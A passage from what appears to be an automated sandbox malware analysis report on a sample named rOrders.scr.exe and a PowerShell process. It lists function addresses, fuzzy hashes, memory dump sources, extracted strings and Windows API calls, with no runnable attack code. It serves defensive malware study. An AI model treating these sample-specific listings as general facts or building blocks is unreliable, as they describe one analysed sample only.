Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d21ed9b8bcccf6c4995a843c21951e893e89c5058cb82f68e8763068807fca52
Instruction ID: 621d9aa89ee5cb5a6d41b5a61e8a5933f068867bab876f6fc476ea2df61eeb6e
Opcode Fuzzy Hash: d21ed9b8bcccf6c4995a843c21951e893e89c5058cb82f68e8763068807fca52
Instruction Fuzzy Hash: 3A21E0B5D00209DFDB10CFAAD985ADEBBF5EB48320F24801AE918B7310D378A944CF60

Function 07A75271 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07A752FD

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 62cf836de5924312c5d588b2d06554c788123da0784cb363101bea6f53b987c8
Instruction ID: e1e4db34afa08888d79fb25043555632f0ebb7b227895c13288491f43da7802c
Opcode Fuzzy Hash: 62cf836de5924312c5d588b2d06554c788123da0784cb363101bea6f53b987c8
Instruction Fuzzy Hash: 262167B58003099FDB10CF99C985BDEBBF8EF48320F14845AE454A7251C378A944CFA1

Function 07A71561 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 07A715D2

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 7c4e64b3069714ad7a5486a8f87e9daff6651ccbbc52745bc51b7213ee916f09
Instruction ID: 3e28bf35a819689464df11bf19c82abc3b474c034417809c986ed0d7392c68c8
Opcode Fuzzy Hash: 7c4e64b3069714ad7a5486a8f87e9daff6651ccbbc52745bc51b7213ee916f09
Instruction Fuzzy Hash: 4D1106B2D002498FDB14CF9AC845BDEBBF4EB88320F14842AD869A7640D779A545CFA1

Function 07A71568 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 07A715D2

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 9717672f8916341bfcc446cf2ea7c4be10b3d99b048b960e5813764347e851ce
Instruction ID: 0d190ea85cc014e22451b5654b4a570cd55e1ec0436628503777f24a37baf1a2
Opcode Fuzzy Hash: 9717672f8916341bfcc446cf2ea7c4be10b3d99b048b960e5813764347e851ce
Instruction Fuzzy Hash: 4D1123B2C002498FDB14CF9AC844BDEFBF4EF88320F14842AD869A7640D778A545CFA1

Function 07A71B38 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 07A71B9D

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d6b87061032b7b262a13c83827b10fa11255d3cf5369598fc293f63365d58d05
Instruction ID: 7a63313190b5d1d0529db0b1087d02ceac2468d7bebc31474ffaea4d487e137f
Opcode Fuzzy Hash: d6b87061032b7b262a13c83827b10fa11255d3cf5369598fc293f63365d58d05
Instruction Fuzzy Hash: 811125B58002099FCB10CF9AC985BDEBBF8FB88320F10841AE418A7640D375A544CFA0

Function 07A752A0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07A752FD

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 428631943b49ca6cf7de12db8b6bacf16a7de7e9aa15ccb6f8f6e4d99f4bd532
Instruction ID: 10ae8796106e5f4a02d4f03a17d937a9c12f9f86759931df03b4e573a217ad5b
Opcode Fuzzy Hash: 428631943b49ca6cf7de12db8b6bacf16a7de7e9aa15ccb6f8f6e4d99f4bd532
Instruction Fuzzy Hash: D31106B5800349DFDB10CF9AC945BDEFBF8EB48320F14841AE554A3251D379A544CFA5

Function 0115AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF9E

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 518a7be68987d4754bd8890887edbea8e9dccb3d123d6a4fe5fbc4b1fe6b5211
Instruction ID: a0eef8b1297eafdac0ae6cac6c54c24ca4856a775ae0e01d1710ff326bdfcb3c
Opcode Fuzzy Hash: 518a7be68987d4754bd8890887edbea8e9dccb3d123d6a4fe5fbc4b1fe6b5211
Instruction Fuzzy Hash: 8E110FB5C00249CFDB14CF9AD544BDEFBF4AF88224F14851AD928A7240C379A545CFA1

Function 07A7009C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 07A71B9D

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d131524f8d961ed0af3980eb95424d48cebb90e25b11a81edd5986c98a3b130a
Instruction ID: 604052f6abe37e6eb3b28e2e9e77fcad8223f5c95152aeac47033161a2d21d8d
Opcode Fuzzy Hash: d131524f8d961ed0af3980eb95424d48cebb90e25b11a81edd5986c98a3b130a
Instruction Fuzzy Hash: BD1106B5800349DFCB10DF9AD985BDEFBF8EB88320F108459E954A7600D375A944CFA1

Function 05161B30 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05161B95

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e9a22aaa1f7118401aaa3395dd9ef90f8c36ca7b35181b27b676fac602e70050
Instruction ID: 82c9b802030ad51c02f4b04bb0d13a0301a367b77dd64b6ab9ef19accf2dc2db
Opcode Fuzzy Hash: e9a22aaa1f7118401aaa3395dd9ef90f8c36ca7b35181b27b676fac602e70050
Instruction Fuzzy Hash: 0C11F5B58002499FDB10CF9AD585B9EBBF8FB88320F24841AD915B3300D375A944CFA5

Function 07A7DFF0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,07A7E6C7), ref: 07A7F165

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7c21341d86021b2702c39e9a30bc2503182c612d79b16e79b488f0b29f218a9f
Instruction ID: df9b4981aeca1705791681de1502d7b590f812ccd0985d9e2df5229e369125ef
Opcode Fuzzy Hash: 7c21341d86021b2702c39e9a30bc2503182c612d79b16e79b488f0b29f218a9f
Instruction Fuzzy Hash: 9D11F2B5C046498FCB10CF9AD984BDEFBF4EB88324F10842AE528A3700D379A544CFA5

Function 07A75558 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07A76C3D

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d2da39f637da49cb5807369c7fc6923f781749f8eeb75b08d54a0af4d75282b5
Instruction ID: 51661b177276202647d06664d686ee5ca0e06fdf55785602bcc70ee515d7f121
Opcode Fuzzy Hash: d2da39f637da49cb5807369c7fc6923f781749f8eeb75b08d54a0af4d75282b5
Instruction Fuzzy Hash: C71118B58007499FCB20DF9AD945BDEBBF8EB48324F248459D518A7300D375A544CFA5

Function 07A7F100 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,07A7E6C7), ref: 07A7F165

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: ffc8ad6d8542ef61095def7bd5eafd5759bc59882364bebd262fbf4c9ddef5a0
Instruction ID: 61ececc9a199eeac2a7a7fbdc7765c72c55607aff5bc3b14319feb4d82e85ec6
Opcode Fuzzy Hash: ffc8ad6d8542ef61095def7bd5eafd5759bc59882364bebd262fbf4c9ddef5a0
Instruction Fuzzy Hash: A61125B4C002498FCB10CFAAD844BDEFBF4AB88324F24855ED419A7610C3746545CFA1

Function 05161B38 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05161B95

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f90e8b1b625ddcd7ed79510c573eb9ebc934fedb29ff608bf931a30c92f5d6cc
Instruction ID: 2f3850e8ae71042fdcfb70bef075cad5f1bef09074f146574b5094788756af61
Opcode Fuzzy Hash: f90e8b1b625ddcd7ed79510c573eb9ebc934fedb29ff608bf931a30c92f5d6cc
Instruction Fuzzy Hash: EF1103B58002499FDB10CF9AC585BDEBBF8EB88320F20841AD918B3300C375A944CFA1

Function 07A76BE1 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07A76C3D

Memory Dump Source

Source File: 00000000.00000002.4567507147.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a70000_rOrders.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5465c665199fb17724c72d6825d802d51e04e3914a83a88351267f553507dd2a
Instruction ID: 7580fbaba9398f0557d0d309992ad3b1892181d6aefacb65f858d69155efd90b
Opcode Fuzzy Hash: 5465c665199fb17724c72d6825d802d51e04e3914a83a88351267f553507dd2a
Instruction Fuzzy Hash: 061112B5C006098FCB10CF9AD985BDEBBF8EB48324F24845AD528B7200D378A944CFA1

Function 00ECD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4532326508.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ecd000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a71853545a0ed34c3cdfbb5bf359769bb21e39424f6ad6741102350d94291ec3
Instruction ID: 886a3c2c8243d266be509a34aa5ad021af3d5502a622b5533dc738847c940347
Opcode Fuzzy Hash: a71853545a0ed34c3cdfbb5bf359769bb21e39424f6ad6741102350d94291ec3
Instruction Fuzzy Hash: 0521C1755082009FCB14DF18DAC1F26BB66EB84318F24C56DD94A5B296C337D847CA61

Function 00ECD2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4532326508.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ecd000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861edd26245741296a489be140e7dc2e76faa2cfd9d11b35c31b1bd63c4d06e8
Instruction ID: d5744bfb2f5f581496e9229e74ebc2e7c9be7f68e25f3a35bbaa80c0773010f0
Opcode Fuzzy Hash: 861edd26245741296a489be140e7dc2e76faa2cfd9d11b35c31b1bd63c4d06e8
Instruction Fuzzy Hash: CB21C2B55082849FDB159F18DAC0F2ABB65FB84328F24C57ED8495B241C33BD847DAA2

Function 00ECD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4532326508.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ecd000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38344df8b6a200da256d4ffb70ccae5a009b5e433b45da23ad14f5d5e24c4fdc
Instruction ID: c4d4f6f8fc73f8234159504042bbd9bd71a8ca032dabecb00a99987f17a31d73
Opcode Fuzzy Hash: 38344df8b6a200da256d4ffb70ccae5a009b5e433b45da23ad14f5d5e24c4fdc
Instruction Fuzzy Hash: D12171755093808FD712CF24D990B15BF72EB46214F28C5EAD8498B6A7C33B980BCB62

Function 00ECD2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4532326508.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ecd000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction ID: 13ec7b17c82bdd0f70d1913eb994074e81f903ead333991247b33977520bcd55
Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction Fuzzy Hash: FF119375508680CFDB11CF14DAC4B19BB61FB84318F24C5AED8495B656C33BD456CB92

Non-executed Functions

Function 05160040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eac5bd28887512e50d749fdb6627590dfb244fe3ec56e9a80fabc6f36cc9eac
Instruction ID: 8c6409224259caa1f6c323a443c63c7160775872c5b439fa42fce78ba0d30c83
Opcode Fuzzy Hash: 9eac5bd28887512e50d749fdb6627590dfb244fe3ec56e9a80fabc6f36cc9eac
Instruction Fuzzy Hash: 9612C6F0C897458BE710CF25E94C1A93BB1BB55318BF24A09C1617F2E5DBB825AACF44

Function 0115D304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535467298.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1150000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb0280d7fc29da1e2bc7d2a7066d1a819e2e5bb3f2fbe2b6db5106c32242e00
Instruction ID: 3f807fccf52a4e97274f5996fb28aa38ea43c3c44f7c4442546a39304884c41b
Opcode Fuzzy Hash: 6eb0280d7fc29da1e2bc7d2a7066d1a819e2e5bb3f2fbe2b6db5106c32242e00
Instruction Fuzzy Hash: F1A19336E00606CFCF49DFB4C84459EBBB2FF85304B2585AAED15AB261DB31E916CB40

Function 05160006 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562712723.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5160000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40a52d7da7753ad1734c44702b63aeb414ed820a1906b4ebb888c7537937aa1
Instruction ID: bb986de40a73a660e1dbc2168a45bd74dcd9c2dab15a5fe03f102e9c70ae79a2
Opcode Fuzzy Hash: c40a52d7da7753ad1734c44702b63aeb414ed820a1906b4ebb888c7537937aa1
Instruction Fuzzy Hash: 0FC128B0C887458BD710CF24E8481A93BB1BF95324FF64A19D1617B2E5DBB835AACF44

Analysis Process: powershell.exePID: 1520, Parent PID: 1848COMMON

Executed Functions

Function 03776BA8 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2089432529.0000000003770000.00000040.00000800.00020000.00000000.sdmp, Offset: 03770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19efcc873595620025a020ddfbf340e468d201294c552eb4fd7364346a981ae6
Instruction ID: b6030fb1bd150288512d8038e8897cd74436ac50f72c7f601ee34700b2c38c2c
Opcode Fuzzy Hash: 19efcc873595620025a020ddfbf340e468d201294c552eb4fd7364346a981ae6
Instruction Fuzzy Hash: 55819334A052489FCB05CFA5D4809AEFBF2FF89310F1480AAE954AB361C735AD45DB60

Function 037729F0 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2089432529.0000000003770000.00000040.00000800.00020000.00000000.sdmp, Offset: 03770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8e577ff5143adff542d8a5820859cdc77bd7bef8e2474c02d1e80140bfbf9e
Instruction ID: 8466b1ad5ebc0bf3ca974d80998bac99f1615531972d467bf555598665eb0817
Opcode Fuzzy Hash: 4b8e577ff5143adff542d8a5820859cdc77bd7bef8e2474c02d1e80140bfbf9e
Instruction Fuzzy Hash: 0A916C74A006458FCB15CF9DC4949BEFBB1FF88310B298699D825AB366C735EC51CBA0

Function 03772B00 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2089432529.0000000003770000.00000040.00000800.00020000.00000000.sdmp, Offset: 03770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332b20457b3dda24deb86fb90cbc35227df3bc8da303cd20186c7d4ee579dc6a
Instruction ID: c09ae6d9fa1691fbeb2fdaa86b8566dd5fda0c1678d4dce1469a5e98bdbde285
Opcode Fuzzy Hash: 332b20457b3dda24deb86fb90cbc35227df3bc8da303cd20186c7d4ee579dc6a
Instruction Fuzzy Hash: 16410674A005059FCB06CF59C4989BEFBB5FF48310B258699D825AB366C732ED91CBA0

Function 03772C85 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2089432529.0000000003770000.00000040.00000800.00020000.00000000.sdmp, Offset: 03770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4deefad83204e7b34bea3c31a152bd3c94410e57121b02e212a3ea4fd1223f6c
Instruction ID: de62121ec2fe050a8e3fb9ede16cf453e8aec01bc8fc54ce10822db7e42c91ba
Opcode Fuzzy Hash: 4deefad83204e7b34bea3c31a152bd3c94410e57121b02e212a3ea4fd1223f6c
Instruction Fuzzy Hash: 7521923190A3914FCB07DB68D8A05DABF70EF47224B1945C7D0909F2A3C6368D5AC766

Function 035AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2088419362.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a491d3cd984a6f0e2d7d08c900f13c223d2c3378c91f57e757aa0299db2b0e
Instruction ID: 91ca9acebbc7c3d749314810a19cf2925d837103800091e6c8a73275b3092e28
Opcode Fuzzy Hash: e4a491d3cd984a6f0e2d7d08c900f13c223d2c3378c91f57e757aa0299db2b0e
Instruction Fuzzy Hash: 3A01D471405B409AE720DA29E8C4B6ABFF8FB41724F0CC45AED484A562D6799841E6B1

Function 035AD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2088419362.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb13763a38474b5e1545b5ecc45ae8638642f3cf8c3ad4ffcabe82e9b195861e
Instruction ID: 827db010c404aeb443bdc280289c823f15bdbf014cf4ec2e4deb4a2996dadf9a
Opcode Fuzzy Hash: fb13763a38474b5e1545b5ecc45ae8638642f3cf8c3ad4ffcabe82e9b195861e
Instruction Fuzzy Hash: 35016D6240E3C05ED7128B259894B56BFB8EF53224F1D80CBD8888F5A3C2689845D772

Analysis Process: rOrders.scr.exePID: 4760, Parent PID: 1848COMMON

Executed Functions

Function 02B5B328 Relevance: 6.6, Strings: 5, Instructions: 348COMMON

Download Yara Rule

Strings

LjVp, xrefs: 02B5B6E5
0oVp, xrefs: 02B5B562
PHsq, xrefs: 02B5B747
PHsq, xrefs: 02B5B758
LjVp, xrefs: 02B5B6CF

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 315ca9e17c8c5155eeac257d3aef7e9fa451d2805440dfd7107f5d5ae644b0db
Instruction ID: 1cc7673508d630759bded2b28f57462579c20b18186cc9b55ff907e708f2cd81
Opcode Fuzzy Hash: 315ca9e17c8c5155eeac257d3aef7e9fa451d2805440dfd7107f5d5ae644b0db
Instruction Fuzzy Hash: BDE1C775A00228CFDB14DFA9C994B9DBBF1FF59314F1980A9E819AB365DB30A841CF50

Function 02B5C753 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

LjVp, xrefs: 02B5C92F
PHsq, xrefs: 02B5C9A7
0oVp, xrefs: 02B5C7C2
PHsq, xrefs: 02B5C9B8
LjVp, xrefs: 02B5C945

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 49438fc4b40204c37693e6edd8a72a732689ba872a1c29ece5311583c568c6c1
Instruction ID: a1414f464b4a746e2e00f83d62505f013e4e83a70dd3be13a49ea778a6c97c86
Opcode Fuzzy Hash: 49438fc4b40204c37693e6edd8a72a732689ba872a1c29ece5311583c568c6c1
Instruction Fuzzy Hash: BB81B674E01218CFDB18DFA9D994B9DBBF2BF88310F1490AAE819AB355DB705981CF50

Function 02B5BEB0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHsq, xrefs: 02B5C107
PHsq, xrefs: 02B5C118
0oVp, xrefs: 02B5BF22
LjVp, xrefs: 02B5C0A5
LjVp, xrefs: 02B5C08F

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 16c7db1252f0557eb0810ccc848311a5efea0fb50924084524c78c830845fb93
Instruction ID: 5ef5037964770bdefd1fa3f824905d0909ff7e29cc9fc36b4b21a79da1eb1d7d
Opcode Fuzzy Hash: 16c7db1252f0557eb0810ccc848311a5efea0fb50924084524c78c830845fb93
Instruction Fuzzy Hash: A981A474E00218CFDB14DFA9D994B9DBBF2BF88314F1490AAE819AB355DB709981CF50

Function 02B5C190 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

PHsq, xrefs: 02B5C3F8
LjVp, xrefs: 02B5C36F
0oVp, xrefs: 02B5C202
PHsq, xrefs: 02B5C3E7
LjVp, xrefs: 02B5C385

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 4112a8cef0d471c24929cf5153b2b28bb3273ac2e485119044c23b6923f88e73
Instruction ID: 3558e87fa3758231e39e61f2b86eb00663b4d30f9e67eb981fac25dede296611
Opcode Fuzzy Hash: 4112a8cef0d471c24929cf5153b2b28bb3273ac2e485119044c23b6923f88e73
Instruction Fuzzy Hash: 7E818475E002189FDB14DFA9D984A9DBBF2FF88300F14D0AAE819AB355DB709981CF50

Function 02B5C470 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjVp, xrefs: 02B5C665
LjVp, xrefs: 02B5C64F
PHsq, xrefs: 02B5C6D8
0oVp, xrefs: 02B5C4E2
PHsq, xrefs: 02B5C6C7

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 50b09abe9f30b14059478e9fc5e37da1adce5f9d69933cc9780f961baa94dd36
Instruction ID: 7205362d3151e72df28b51fb5ac9963a98fde1e9ba40aaa4023a335e6778eb12
Opcode Fuzzy Hash: 50b09abe9f30b14059478e9fc5e37da1adce5f9d69933cc9780f961baa94dd36
Instruction Fuzzy Hash: 6C8195B5E00218CFDB14DFA9D994A9DBBF2BF88300F14D0AAE819AB355DB705981CF50

Function 02B54AD9 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjVp, xrefs: 02B54CCE
LjVp, xrefs: 02B54CB8
PHsq, xrefs: 02B54D30
0oVp, xrefs: 02B54B4A
PHsq, xrefs: 02B54D41

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 959f2511f023bda3a4e1a25e6d0a380536e4a3bbae1afbfe19ee3b8c7606878d
Instruction ID: 718cc85ec056dc4754a47cbcba0d8d7ac111d2f686810804fc8f38aee1fcd2a5
Opcode Fuzzy Hash: 959f2511f023bda3a4e1a25e6d0a380536e4a3bbae1afbfe19ee3b8c7606878d
Instruction Fuzzy Hash: 11818474E00258DFDB18DFA9D994A9DBBF2BF89300F1490A9E819AB355DB309981CF50

Function 02B5CA33 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

0oVp, xrefs: 02B5CAA2
PHsq, xrefs: 02B5CC98
PHsq, xrefs: 02B5CC87
LjVp, xrefs: 02B5CC25
LjVp, xrefs: 02B5CC0F

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

